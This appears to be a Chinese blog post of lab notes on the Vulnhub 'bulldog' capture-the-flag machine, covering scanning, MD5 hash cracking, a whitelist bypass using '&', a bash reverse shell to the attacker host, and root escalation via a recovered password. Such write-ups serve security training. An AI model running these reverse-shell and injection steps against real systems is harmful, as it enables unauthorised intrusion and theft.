Vulnhub----bulldog靶场笔记
2024-08-25 04:57:54
前提条件
kali和bulldog靶机的的ip地址在同一个网段
本测试环境:
kali
:192.168.56.102
bulldog
:192.168.56.101
主机探测
利用kali的netdiscover
工具扫描靶机ip地址
kali和bulldog靶机的的ip地址在同一个网段
本测试环境:
kali
:192.168.56.102
bulldog
:192.168.56.101
扫描靶机端口
利用kali的nmap
工具扫描靶机ip地址
nmap -p- 192.168.56.101
扫描目标靶机端口的详细服务信息
nmap -p23,80,8080 -A -T4 192.168.56.101
web服务是python2
用浏览器访问192.168.56.101
并未发现异常;接下来扫描网站
发现了 /dev /admin robots.txt
/admin 是一个登录页面,SQL注入并未成功
/robots.txt 并未发现异常
访问/dev,发现了webshell连接,但是显示需要验证身份,可能需要先登录才能有权限使用此webshell
在注释中发现了异常
MD5值加密,使用在线解密网站解密试试。
成功解密两个账号密码:
- nick---bulldog
- sarah---bulldoglover
使用其中一个用户登录成功,然后使用/dev/中的webshell
白名单限制了使用的命令,通过&
绕过
- 现在可以使用
echo 'bash -i >& /dev/tcp/192.168.56.102/6666 0>&1'|bash
反弹shell到kali上 - kali上用nc侦听6666端口
nc -nvlp 6666
kali机成功获得反弹的shell
提权
使用普通用户的权限并没有发现要获得的信息,于是要提升root权限
在/home目录下发现bulldogadmin文件夹,看文件名觉得里面应该有东西
发现了隐藏文件夹,进去看看里面的东西
使用cat
命令没有发现异常,使用strings
发现下面了信息,去掉应该H是root密码---> SUPERultimatePASSWORDyouCANTget
在获得的shell界面直接切换root用户报错
于是使用python脚本
python -c 'import pty; pty.spawn("/bin/bash")'
输入刚才获取的密码即可
成功获取flag
后续技能学习:
- 反弹shell脚本,不仅仅限于bash方法
python -c 'import pty; pty.spawn("/bin/bash")'
此类常用的shell代码
最新文章
- 你真的会玩SQL吗?和平大使 内连接、外连接
- 计算机开放电子书汇总(包括二十多本python相关的图书教程)
- Hibernate5.2关联关系之双向一对多(三)
- XML的总结学习
- django 笔记
- Residual Networks <;2015 ICCV, ImageNet 图像分类Top1>;
- [转]bat中的特殊字符,以及需要在bat中当做字符如何处理
- 黑盒测试用例设计方法&;理论结合实际 ->; 判定表驱动法
- Unity Panel open &; close
- BZOJ 2561: 最小生成树(最小割)
- Dom4j和Xpath(转)
- 《微信小程序七日谈》- 第六天:小程序devtool隐藏的秘密
- com.android.ide.common.process.PrecessException:org.gradle.process....finished with non-zero exit value 1
- RedHat升级Python到2.7.6
- 副本机制与副本同步------《Designing Data-Intensive Applications》读书笔记6
- 第六篇Scrum冲刺博客
- python实现归并排序算法
- DotNetty z
- UnicodeDecodeError异常
- 【特性】Redis4.0新特性
热门文章
- Gym - 101128E Wooden Signs DP
- 单选按钮(radio)的取值和点击事件
- Leetcode No.119 Pascal&#39;s Triangle II(c++实现)
- Spring cloud中相关的工具和库
- 通过原生js实现数据的双向绑定
- servlet核心技术2
- 「POJ3436」ACM Computer Factory题解
- 机器学习Sklearn系列:(四)朴素贝叶斯
- 【论文阅读】PRM-RL Long-range Robotic Navigation Tasks by Combining Reinforcement Learning and Sampling-based Planning
- Python中字典get方法的使用技巧